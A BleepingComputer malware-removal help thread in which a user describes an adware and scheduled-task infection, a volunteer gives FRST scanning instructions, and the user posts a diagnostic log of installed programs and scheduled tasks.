Bitsadmin.exe & downloading random stuff through CMD.


  • This topic is locked
14 replies to this topic

#1 Pepsiman22

Pepsiman22

  • Members
  • 7 posts
  • OFFLINE
  • Local time:01:34 PM

Posted 15 January 2018 - 12:07 AM

Heya. Call me Gio. So, I've made a wrong turn and ended up downloading this Russian installer. Seems like I misclicked something and ended up getting myself in a sticky situation:
First, I got this new browser (copy-pasted from Chrome, wasn't Chromium, it was something along the lines of "Go!". Can't remember).
Secondly, a few suspicious browser extensions appeared and the default search engine was changed, no biggie, usually happens. Turns out that even if I changed my engine to Google, the search engine wouldn't change. Had to restart Chrome by default and uninstall the bad browser. Everything relatively easy at this point.
Thirdly, CMD popped up and started downloading some stuff (couldn't get the names, it was pretty fast, it was something along the lines of "Ccyx-stuff stuff"). Then I popped up Avira and Malwarebytes. Did some scanning and CMD popped up again.
Fourthly, I got this CMD: https://imgur.com/i2cblKy
It basically says that a task called "oiemMex" was created, and the bitsadmin. Then I checked the Task Scheduler and it turns out it was there and it was supposed to open a program called "XASormJT" in Program Files. Deleted the file and tried deleting the task, but it didn't work, so now I'm here.
Edit: While desperately checking the scheduler, I found two others that are supposed to start every three hours: EOrUYoez.bat and IwPFYU.exe.
Deleted them both too.


Edited by Pepsiman22, 15 January 2018 - 12:23 AM.




#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  • Gender:Male
  • Local time:12:34 PM

Posted 15 January 2018 - 08:20 AM

Hi Pepsiman22 :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply right after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you not to seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system: I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of it as fast as we can, before it makes unknown changes to the system. This being said, I would appreciate it if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like formatting and reinstalling Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate it if you were to stay with me until the end, which means until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full-time job, so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean up some malware, so let's get started, shall we? :)

Farbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and run a scan on your system with FRST, and provide the logs in your next reply.
  • Download the right version of FRST for your system:
    • FRST 32-bit
    • FRST 64-bit
      Note: Only the right version will run on your system; the other will throw an error message. So if you don't know what your system's version is, simply download both of them, and the one that works is the one you should be using.
  • Move the executable (FRST.exe or FRST64.exe) to your Desktop
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the disclaimer by clicking on Yes, and FRST will then make a back-up of your Registry, which should take a few seconds
  • Make sure the Addition.txt box is checked
  • Click on the Scan button
  • On completion, two message boxes will open, saying that the results were saved to FRST.txt and Addition.txt, and then two Notepad files will open
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  • Local time:01:34 PM

Posted 15 January 2018 - 06:20 PM

Hey, what's up Aura! Nice to meet you, you seem like a chill person. Just for the record, how do you make a "Spoiler" button? I just want to keep it all as clean as possible. Also, I want to thank you beforehand for helping me and reading all of this.
Here are the logs, friendo:
 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.01.2018
Ran by Franco (15-01-2018 20:05:15)
Running from C:\Users\Franco\Downloads
Windows 7 Professional Service Pack 1 (X64) (2017-05-23 19:52:53)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrador (S-1-5-21-2176517476-3644118065-910164434-500 - Administrator - Disabled)
Franco (S-1-5-21-2176517476-3644118065-910164434-1000 - Administrator - Enabled) => C:\Users\Franco
Invitado (S-1-5-21-2176517476-3644118065-910164434-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ACP Application (HKLM\...\{CC5B3AA9-1152-E9B3-7DCF-0F2B313DFFB3}) (Version: 2017.1102.1434.20 - Advanced Micro Devices, Inc.) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 28.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 27 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 27.0.0.170 - Adobe Systems Incorporated)
Adobe Flash Player 28 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 28.0.0.137 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated)
Adobe Premiere Pro CS6 (HKLM-x32\...\{7176B973-6011-43C1-AEBC-2D73FE7C6982}) (Version: 6.0 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
APP Shop v1.0.31 (HKLM-x32\...\{90242E9B-BC60-46E3-8EE7-8E953F702280}_is1) (Version: 1.0.31 - ASRock Inc.)
ASRock App Charger v1.0.6 (HKLM\...\ASRock App Charger_is1) (Version: 1.0.6 - ASRock Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.9.2322 - AVAST Software)
CCleaner (HKLM\...\CCleaner) (Version: 5.37 - Piriform)
Cheat Engine 6.4 (HKLM-x32\...\Cheat Engine 6.4_is1) (Version:  - Cheat Engine)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.5.1.0232 - Disc Soft Ltd)
Defraggler (HKLM\...\Defraggler) (Version: 2.21 - Piriform)
Discord (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
Epic Games Launcher (HKLM-x32\...\{4842BC16-D55B-4DB2-8F0D-72F5EA320D92}) (Version: 1.1.133.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 63.0.3239.132 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Hard Disk Sentinel PRO (HKLM-x32\...\Hard Disk Sentinel_is1) (Version: 5.01 - Janos Mathe)
Java 8 Update 151 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\{11B6CA74-0359-4E8B-9729-1902B9ADD29C}) (Version: 4.1.2 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
Malwarebytes versión 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Microsoft .NET Framework 4.6.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01590 - Microsoft Corporation)
Microsoft .NET Framework 4.6.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01590 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.14.162.1217 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 19.0.3 - OBS Project)
Paquete de controladores de Windows - Realtek (RTL8167) Net  (12/23/2016 7.104.1223.2016) (HKLM\...\8FE7583BA3BE7DC67C5AE21C06F30A7E65FB3C21) (Version: 12/23/2016 7.104.1223.2016 - Realtek)
PBE (HKLM-x32\...\PBE 1.0) (Version: 1.0 - Riot Games, Inc)
PokeMMO (HKLM\...\PokeMMO_is1) (Version:  - PokeMMO)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8105 - Realtek Semiconductor Corp.)
SafeZone Stable 3.55.2393.607 (HKLM-x32\...\SafeZone 3.55.2393.607) (Version: 3.55.2393.607 - Avast Software) Hidden
SafeZone Stable 4.58.2552.909 (HKLM-x32\...\SafeZone 4.58.2552.909) (Version: 4.58.2552.909 - Avast Software) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\TeamSpeak 3 Client) (Version: 3.1.6 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.78716 - TeamViewer)
The Sims 4 (HKLM-x32\...\The Sims 4_is1) (Version:  - )
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-11-02] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0F1EFFAE-A569-4A3A-A19B-97089D6E1F79} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
Task: {1A9C244C-8D4E-4972-ACDB-1CF6368E38CF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-01-14] (Adobe Systems Incorporated)
Task: {2DB0BC69-3694-4F14-9B65-18DA99A90F63} - System32\Tasks\SafeZone scheduled Autoupdate 1495573797 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-08-04] (Avast Software)
Task: {3192ACC3-D0C4-4F5E-AEF8-0306FD536929} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {3314EAC1-A834-477A-A2BD-5882057E1A29} - System32\Tasks\AdobeAAMUpdater-1.0-Porota-Franco => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {3D126450-53B3-4AF4-B414-123A9EA3F68E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2018-01-08] (AVAST Software)
Task: {4C12F257-5402-4E88-A485-D81BE17037DB} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe
Task: {4DB06FFB-23AA-427E-90E0-7BD6E0730732} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-23] (Google Inc.)
Task: {4E728FA0-BF71-49ED-9C7F-01337D2959DF} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_27_0_0_170_pepper.exe [2017-10-18] (Adobe Systems Incorporated)
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\Adobe Flash Player PPAPI Notifier" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\AdobeAAMUpdater-1.0-Porota-Franco" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\CCleaner Update" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(4): schtasks.exe -> /Change /TN "\CCleanerSkipUAC" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(5): schtasks.exe -> /Change /TN "\DriverDoc Auto Start" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe -> /Change /TN "\dzopercomjhar" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(7): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineCore" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(8): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineUA" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(9): schtasks.exe -> /Change /TN "\Microsoft_Hardware_Launch_ipoint_exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(10): schtasks.exe -> /Change /TN "\Microsoft_Hardware_Launch_itype_exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(11): schtasks.exe -> /Change /TN "\Microsoft_Hardware_Launch_mousekeyboardcenter_exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(12): schtasks.exe -> /Change /TN "\Microsoft_MKC_Logon_Task_ceip.exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(13): schtasks.exe -> /Change /TN "\Microsoft_MKC_Logon_Task_ipoint.exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(14): schtasks.exe -> /Change /TN "\Microsoft_MKC_Logon_Task_itype.exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(15): schtasks.exe -> /Change /TN "\mtxoaIdylJOZ" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(16): schtasks.exe -> /Change /TN "\oieMmex" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(17): schtasks.exe -> /Change /TN "\pSER" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(18): schtasks.exe -> /Change /TN "\SafeZone scheduled Autoupdate 1495573797" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(19): schtasks.exe -> /Change /TN "\StartCN" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(20): schtasks.exe -> /Change /TN "\{41144399-A0E8-4F67-B667-8A207B530D7C}" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(21): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE
Task: {5D79BA49-76DB-48D6-9D91-99819EFC9CEA} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2017-11-08] (Piriform Ltd)
Task: {63335D8B-5991-4819-A7D7-AC1C118D5C54} - System32\Tasks\DriverDoc Auto Start => D:\Solvusoft\DriverDoc\DriverDoc.exe
Task: {8D40ADE7-608A-4DB9-B440-2F9BB0BE8220} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-11-08] (Piriform Ltd)
Task: {ADD2F042-4814-44F2-8959-3C7E88ADA4EF} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-01-07] (AVAST Software)
Task: {BF825648-2593-4AD0-847E-8B6C6B149192} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-23] (Google Inc.)
Task: {D0A562C7-198A-4648-BB81-8C4FE25D7CE1} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-11-02] (Advanced Micro Devices, Inc.)
Task: {D1E5BB4A-1E14-4C24-9AD1-9DC771B75CE5} - System32\Tasks\HardDiskSentinel\Hard Disk Sentinel_Franco => D:\Hard Disk Sentinel\HDSentinel.exe [2017-03-09] (H.D.S. Hungary)
Task: {DCB73935-10AA-4788-AD5E-15667CBCBA14} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\DriverDoc Auto Start.job => D:\Solvusoft\DriverDoc\DriverDoc.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2018-01-07 23:22 - 2018-01-07 23:22 - 000067920 _____ () c:\Program Files\AVAST Software\Avast\x64\module_lifetime.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000067984 _____ () C:\Program Files\AVAST Software\Avast\x64\dll_loader.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000236840 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000902824 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000349568 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll
2017-07-25 12:25 - 2017-07-25 12:25 - 000015360 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.DLL
2017-07-25 12:25 - 2017-07-25 12:25 - 002519040 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2018-01-09 02:46 - 2018-01-03 06:20 - 004063064 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libglesv2.dll
2018-01-09 02:46 - 2018-01-03 06:20 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libegl.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000058016 _____ () C:\Program Files\AVAST Software\Avast\module_lifetime.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000057504 _____ () C:\Program Files\AVAST Software\Avast\dll_loader.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000206152 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000289272 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000196248 _____ () C:\Program Files\AVAST Software\Avast\network_notifications.dll
2018-01-15 05:49 - 2018-01-15 05:49 - 005768336 _____ () C:\Program Files\AVAST Software\Avast\defs\18011500\algo.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000745408 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000148936 _____ () C:\Program Files\AVAST Software\Avast\hns_tools.dll
2018-01-15 19:54 - 2018-01-15 19:54 - 005768336 _____ () C:\Program Files\AVAST Software\Avast\defs\18011504\algo.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000293944 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-07-23 19:38 - 2017-07-23 19:38 - 067109376 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000282560 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2017-11-02 16:13 - 2017-11-02 16:13 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2017-07-04 19:52 - 2017-11-29 02:09 - 000781088 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2017-07-04 19:52 - 2016-08-31 22:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2017-07-04 19:52 - 2016-08-31 22:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2017-07-04 19:52 - 2016-08-31 22:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
